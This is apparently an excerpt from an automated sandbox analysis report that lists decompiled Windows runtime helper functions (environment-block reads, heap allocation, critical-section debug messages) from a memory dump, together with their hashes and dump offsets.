                                                        • Instruction ID: 1892e2700191797b1d60ea34c16bba4113822951ffa69cce461c46d8070bd17e
                                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                        • Instruction Fuzzy Hash: 2BD0A731521584B9DB81AF14C9287683371BB00308F585A658801855F1C335E909D601
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047EAAB0, Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047EAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                        0x047eaab6
                                                        0x047eaabb
                                                        0x0483a442
                                                        0x00000000
                                                        0x0483a448
                                                        0x0483a454
                                                        0x0483a454
                                                        0x047eaac1
                                                        0x047eaac1
                                                        0x047eaac6
                                                        0x047eaac6

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                        • Instruction ID: c428b91ee497cf7ec39d03e9f633a6e016e069c0d6db62cbef8ae4788ed07d82
                                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                        • Instruction Fuzzy Hash: D3D0E939352A80CFD72ACF1DC554B1573A4BB44B45FC50990E541CBB61E62CE954CA40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0485A537, Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0485A537(intOrPtr _a4, intOrPtr _a8) {

				return L047F8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                        0x0485a553

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                        • Instruction ID: 85cc803d10156da96c0d750fbacea378233ac28cc88218dd8ebec1319345f20e
                                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                        • Instruction Fuzzy Hash: 22C01232080648BBCB126F81CC00F067B2AEB94B60F018010BA080A6608632E970EA84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DDB40, Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047DDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L047F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                        0x047ddb4d
                                                        0x047ddb54
                                                        0x047ddb5f
                                                        0x047ddb56
                                                        0x047ddb56
                                                        0x047ddb5c
                                                        0x047ddb5c

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                        • Instruction ID: e5f26e35aaa18a734c2cc315f18d473c48564fbc1f6c9000886fd64f13e90751
                                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                        • Instruction Fuzzy Hash: 41C08C30290A40ABEB321F20CD01B0136A0BB10B09F4400A06300DA1F0DB78ED01EA00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DAD30, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047DAD30(intOrPtr _a4) {

				return L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                        0x047dad49

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                        • Instruction ID: c11d5a03343f7328bd00df2261b7e51cc660d45f2db71198dab72339dc7ca834
                                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                        • Instruction Fuzzy Hash: 17C08C32080648BBC7126A45CD00F017B2DE790B60F000020B6040A761C932F860D598
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048036CC, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048036CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L047F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                        0x048036d2
                                                        0x048036e8
                                                        0x048036d4
                                                        0x048036e5
                                                        0x048036e5

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                        • Instruction ID: 9321a54d3527939182ef2ed57f6b185b83105c92d2b6c82f5e72f5a74f419535
                                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                        • Instruction Fuzzy Hash: 95C02B70160440FBEF151F30CD00F157254F710B21F6407547330896F0D528BC00E500
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047F3A1C, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047F3A1C(intOrPtr _a4) {
				void* _t5;

				return L047F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                        0x047f3a35

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                        • Instruction ID: af9bc27670da5e287c46dc03ad2ec8cdcdf43d5e28cac90e8a63a344ec5eb3f1
                                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                        • Instruction Fuzzy Hash: D3C08C32080248BBCB126E41DC00F027B29E7A0B60F000020B7040A6608532ED60D988
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047E76E2, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047E76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                        0x047e76e4
                                                        0x00000000
                                                        0x047e76f8
                                                        0x047e76fd

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                        • Instruction ID: 5de814c1524aadd3ddd11d5a5f4034e764ebfdfaf9b2078c174cd0f832988058
                                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                        • Instruction Fuzzy Hash: ADC08C701515809AEB2E6F09CE24B303654AB0C70CF48029CAA01097A1C368B822C208
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047F7D50, Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047F7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                        0x047f7d56
                                                        0x047f7d5b
                                                        0x047f7d60
                                                        0x047f7d5d
                                                        0x047f7d5d
                                                        0x047f7d5d

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                        • Instruction ID: 84b0388ab0ce1c8decbaad6f7924f7ca42020ac24bfadcd3fd7041b655f7c9dc
                                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                        • Instruction Fuzzy Hash: 15B092343019408FCF1ADF18C580B1533E4BB44A40BC400D0E400CBB20D229E8008900
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04802ACB, Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E04802ACB() {
				void* _t5;

				return E047EEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                        0x04802adc

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                        • Instruction ID: ac1ac3d7b63adac79722edadf519d3d370574346de3cd114acb7d73c75aa4e30
                                                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                        • Instruction Fuzzy Hash: F8B01232C10440CFCF02EF44C610F297331FB04750F0549A0900127A30C228BC01CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0486FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E0486FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0481CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04865720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04865720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                        0x0486fdda
                                                        0x0486fde2
                                                        0x0486fde5
                                                        0x0486fdec
                                                        0x0486fdfa
                                                        0x0486fdff
                                                        0x0486fe0a
                                                        0x0486fe0f
                                                        0x0486fe17
                                                        0x0486fe1e
                                                        0x0486fe19
                                                        0x0486fe19
                                                        0x0486fe19
                                                        0x0486fe20
                                                        0x0486fe21
                                                        0x0486fe22
                                                        0x0486fe25
                                                        0x0486fe40

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0486FDFA
                                                        Strings
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0486FE01
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0486FE2B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                        • API String ID: 885266447-3903918235
                                                        • Opcode ID: e05c3b2dd0306dea36e15e657e7be1e1d8bd2fc1a6d14e2b6fb41c17ed4b3a0d
                                                        • Instruction ID: 0465d68201c3e576d8d6d08af1d8d2c65dac1163adf3a85c9d68925c786fa1fa
                                                        • Opcode Fuzzy Hash: e05c3b2dd0306dea36e15e657e7be1e1d8bd2fc1a6d14e2b6fb41c17ed4b3a0d
                                                        • Instruction Fuzzy Hash: BAF021726406017FE7601A49DC02F237F5ADB44730F140719F714955E1EAA2F83097F5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%